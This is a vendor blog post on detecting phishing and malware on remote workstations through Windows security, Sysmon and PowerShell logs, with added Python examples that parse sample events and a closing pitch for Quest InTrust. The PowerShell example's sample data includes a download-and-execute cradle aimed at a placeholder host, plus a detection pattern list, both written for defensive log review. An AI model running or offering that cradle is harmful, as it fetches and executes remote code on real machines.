As mentioned in an earlier post, COVID-19 phishing and malware campaigns are on the rise. Cyber criminals are exploiting the opportunity of today’s chaos:
- the flood of new endpoints connecting to your network via VPN,
- the subsequent and sudden reliance on Azure Active Directory to connect to endpoints and productivity services (outside of VPN),
- and a distracted remote user base wanting the latest coronavirus information.
They say opportunity favors the prepared and these bad actors are prepared. They’ve been running ransomware, other malware and phishing scams, drive-by downloads and pass-the-hash attacks for years. All they need do now is change the messaging to feed into our fear and appetite for COVID-19 intel.
What do all these attacks have in common? They start on user workstations. There are things you can — and should — do to mitigate this risk, like keeping applications on your endpoints properly patched and educating your users so they’re less likely to click malicious links in phishing emails, open attachments infected with ransomware or insert USB drives of unknown provenance. But attackers are both sophisticated and relentless, so some of them will inevitably get through. You need to be able to catch attacks on your endpoints as early as possible so you can intervene before real damage is done. But how?
By carefully monitoring your workstations – and yes, especially during the chaos of your insta-remote workforce. If you’re using native tools, there are three critical logs you need to know how to use to improve endpoint security: the Windows security log, the Sysmon log and the PowerShell logs. Here’s a brief summary of the most important things you can learn from each of these logs.
How to spot these attacks
Windows security log
The Windows security log is the only place you can get many critical events, including these:
- Local user and group enumeration — Malicious code often enumerates the local user accounts and local groups on the workstation to find useful credentials, so monitoring these events can help you spot malicious code before it can move laterally to other systems and use those credentials.
- Local account creation and group changes — Attackers also often create or modify local accounts and local groups (especially the local administrators group), so you want to keep an eye on these events.
- Logon attempts with local accounts — Users normally log on to their workstations using a domain account, so attempts to log in using a local account can be a great indicator of attacks.
- Logon with explicit credentials (event 4648) — Scheduled tasks often log on by explicitly specifying another account’s credentials — but scheduled tasks aren’t generally run on workstations. Therefore, this event can indicate an attacker trying to use credentials they've collected.
- When the user was physically present and active — Any activity on a workstation while it’s locked demands further investigation.
- Firewall configuration change — Sometimes applications add exceptions to the Windows firewall as they’re being installed. Exceptions don’t have to be deliberately malicious to create serious security gaps, so you have to keep a close eye on them.
- Plug-and-play device connections — Since malware often enters a workstation through USB drives or other plug-and-play devices, it’s essential to audit connections from all such devices.
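The checks in the list above, applied to a handful of constructed Security-log records (this is an added example, not code from the original post or from Quest; the event records, host name and account names are made up, and the event IDs are the standard Windows Security IDs for these activities):

```python
# Constructed sample Security-log events for one workstation. Only the fields
# the checks need are lifted out of each event's EventData.
HOST = "WS-0427"
SAMPLE_EVENTS = [
    {"id": 4801, "host": HOST, "time": "09:00"},  # workstation unlocked
    {"id": 4624, "host": HOST, "time": "09:01", "user": "alice", "domain": "CORP"},
    {"id": 4800, "host": HOST, "time": "12:00"},  # workstation locked
    {"id": 4624, "host": HOST, "time": "12:17", "user": "svc_backup", "domain": HOST},
    {"id": 4648, "host": HOST, "time": "12:18", "user": "alice", "target_user": "admin"},
    {"id": 4799, "host": HOST, "time": "12:19", "user": "svc_backup"},
    {"id": 4801, "host": HOST, "time": "13:05"},  # workstation unlocked again
]

# Standard Windows Security event IDs behind the bullets above.
WATCHLIST = {
    4798: "local user group membership enumerated",
    4799: "local security group membership enumerated",
    4720: "local account created",
    4732: "member added to security-enabled local group",
    4648: "logon with explicit credentials",
    4946: "firewall exception rule added",
    6416: "new plug-and-play device recognized",
}

def review_security_log(events, hostname=HOST):
    """Return (time, reason) findings for one workstation's Security log."""
    findings = []
    locked = False  # 4800 = workstation locked, 4801 = workstation unlocked
    for ev in events:
        eid = ev["id"]
        if eid == 4800:
            locked = True
            continue
        if eid == 4801:
            locked = False
            continue
        if eid in WATCHLIST:
            findings.append((ev["time"], WATCHLIST[eid]))
        # A 4624 whose account domain is the computer itself is a local-account logon;
        # workstation users normally log on with a domain account.
        if eid == 4624 and ev.get("domain", "").upper() == hostname.upper():
            findings.append((ev["time"], f"local account logon: {ev['user']}"))
        # Anything at all while the screen is locked deserves a look.
        if locked:
            findings.append((ev["time"], f"activity while locked (event {eid})"))
    return findings
```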
Sysmon log
Sysmon is a free tool from Microsoft that runs as a Windows service, monitors system activity and records it in a Windows event log, which is also called “Sysmon.” Here are a few of the events you should monitor there:
- Process creation — It’s not enough to simply look for obviously malicious processes; attackers can easily create a malicious program with the same name as a legitimate tool or modify an existing program to perform illicit actions. Sysmon provides a hash of the file’s contents so you can spot these sneaky attacks.
- Network connections — Monitoring network connections can also help you spot attackers. Sysmon helps you investigate by linking each connection to a process through the ProcessID and ProcessGUID fields, and providing details about the source and destination hosts.
- Registry changes — To ensure malicious code runs even after the workstation is rebooted, attackers often modify the registry. Sysmon will tell you who made the change, which computer they used, when it happened, the process ID, and the new name of any key or value that was renamed.
- File creation — You need to quickly spot and investigate suspicious file creation events. In particular, you should monitor autostart locations like the Startup folder, as well as temporary and download directories, where malware often appears during initial infection.
- DNS queries and executables — Remote workers relying on ISP DNS or home router DNS are easy to compromise, allowing attackers to hijack DNS to steal user credentials or distribute malware. You will need to enable DNS query logging on the workstation, and then you can monitor DNS queries and the executables that performed them.
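The correlation the list above describes, run over constructed Sysmon records (an added example, not code from the original post or from Sysmon itself): process-creation events are keyed by ProcessGuid so that later network, DNS and file-creation events can be attributed to the process that caused them, and a file-name/hash mismatch marks a process as suspect. The known-good hash, the paths, the domain and the addresses are all made-up placeholders.

```python
import re

# Placeholder known-good hash for a tool attackers like to impersonate; a real
# allowlist would be taken from your golden image.
GOOD = "SHA256=" + "A1" * 32
KNOWN_GOOD = {"svchost.exe": GOOD}

# Constructed sample Sysmon events (field names follow Sysmon's EventData).
SYSMON = [
    {"id": 1, "ProcessGuid": "{g1}", "Image": r"C:\Windows\System32\svchost.exe", "Hashes": GOOD},
    {"id": 1, "ProcessGuid": "{g2}", "Image": r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
     "Hashes": "SHA256=" + "B2" * 32},
    {"id": 22, "ProcessGuid": "{g2}", "QueryName": "covid-update.example"},
    {"id": 3, "ProcessGuid": "{g2}", "DestinationIp": "203.0.113.7", "DestinationPort": 443},
    {"id": 11, "ProcessGuid": "{g2}",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"id": 3, "ProcessGuid": "{g1}", "DestinationIp": "10.0.0.5", "DestinationPort": 445},
]

# Autostart, temp and download locations where new files deserve attention.
AUTOSTART = re.compile(r"\\(Start Menu\\Programs\\Startup|Temp|Downloads)\\", re.I)

def correlate_sysmon(events, known_good=KNOWN_GOOD):
    """Return human-readable findings, each attributed to the originating process."""
    procs, suspect, findings = {}, set(), []
    for ev in events:
        guid = ev["ProcessGuid"]
        if ev["id"] == 1:  # process creation: remember image, check hash by file name
            procs[guid] = ev["Image"]
            name = ev["Image"].rsplit("\\", 1)[-1].lower()
            expected = known_good.get(name)
            if expected and ev["Hashes"].upper() != expected.upper():
                suspect.add(guid)
                findings.append(f"{ev['Image']}: hash does not match known-good {name}")
            continue
        image = procs.get(guid, "<unknown process>")
        if ev["id"] == 11 and AUTOSTART.search(ev["TargetFilename"]):  # file creation
            findings.append(f"{image}: wrote {ev['TargetFilename']}")
        elif guid in suspect and ev["id"] == 22:  # DNS query by a suspect process
            findings.append(f"{image}: DNS query for {ev['QueryName']}")
        elif guid in suspect and ev["id"] == 3:  # network connection by a suspect process
            findings.append(f"{image}: connected to {ev['DestinationIp']}:{ev['DestinationPort']}")
    return findings
```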
PowerShell logs
Hackers love to use PowerShell because it’s so powerful and a required tool for many client operating system and systems management tasks. It’s critical to keep a close eye on PowerShell activity. Monitoring the two PowerShell logs will help you spot:
- Providers loaded — PowerShell providers are programs that make the data in a given data store available in PowerShell. Any unusual loading of providers could indicate malicious activity.
- Module logging — Module logging provides more detailed auditing that includes every command executed and all of its parameters (but not the output of the command).
- Script block logging — Script block logging shows every block of PowerShell code that was executed, which provides a lot more context than seeing each individual command. Even if a hacker tries to hide or obfuscate the command, this event will show the actual command that was executed.
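Script block logging (event 4104 in the Microsoft-Windows-PowerShell/Operational log) splits long script blocks across several events that share one ScriptBlockId, so a reviewer has to reassemble them before reading the actual code. The following added example (not code from the original post) does that reassembly over constructed 4104 records and then scans the complete text for patterns worth a second look; the indicator list and the sample script text are made up for illustration.

```python
import re
from collections import defaultdict

# Constructed sample 4104 records. Block "b1" was logged in two chunks.
SAMPLE_4104 = [
    {"ScriptBlockId": "b1", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$u='http://covid-stats.example/r.ps1';"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-Process | Sort-Object CPU -Descending"},
    {"ScriptBlockId": "b1", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString($u)"},
]

# Patterns that deserve review once the deobfuscated text is in front of you.
INDICATORS = {
    "download cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "in-memory execution": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "encoded payload": re.compile(r"FromBase64String|-enc(odedcommand)?\b", re.I),
}

def reassemble(records):
    """Join chunked 4104 events into complete script blocks keyed by ScriptBlockId."""
    parts = defaultdict(dict)
    for r in records:
        parts[r["ScriptBlockId"]][r["MessageNumber"]] = r
    blocks = {}
    for sid, chunks in parts.items():
        total = next(iter(chunks.values()))["MessageTotal"]
        if len(chunks) != total:
            continue  # still incomplete; keep waiting for the remaining chunks
        blocks[sid] = "".join(chunks[i]["ScriptBlockText"] for i in range(1, total + 1))
    return blocks

def scan(records):
    """Return {ScriptBlockId: [indicator names]} for blocks that match anything."""
    findings = {}
    for sid, text in reassemble(records).items():
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if hits:
            findings[sid] = hits
    return findings
```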
If you’re ready to dig into the details, check out my ebook, “Top 3 Workstation: Logs to Monitor.” It will tell you exactly which event IDs to monitor and how to collect events from each log, and provide other valuable tips, like how to protect Sysmon from tampering.
How to stop these attacks
If that kind of log monitoring sounds like a lot of work, that’s because it is. Moreover, there’s a strong possibility that you’ll miss critical events, because it’s hard to collect logs from all your endpoints in a timely and efficient way (just how many laptops are in use in your organization?), and the logs are incomplete as well as notoriously cryptic.
Furthermore, what do you do with those events when you find them? How do you respond when the activity has already happened? Isn’t it too late?
Unfortunately, native solutions to alert on and stop these attacks in real time are limited. You’ll need to bring in a log management solution to help you make sense of the events as well as alert and respond immediately. Quest InTrust can help you dramatically improve endpoint protection (even for endpoints not on the VPN) while slashing IT workload and storage costs. InTrust enables you to easily trigger automated responses to suspicious events, like blocking the activity, disabling the offending user, reversing the change and/or enabling emergency auditing. For example, check out this video for how to defend against PowerShell attacks with automated response actions from InTrust.
With COVID-19 malicious attacks on the rise, now is the time to elevate workstation monitoring (even for those remote workers using home laptops or machines to stay productive during shelter-in-place orders). Learn more about the workstation logs to monitor as well as the actionable response for Quest InTrust in this ebook, “Top 3 Workstation: Logs to Monitor.”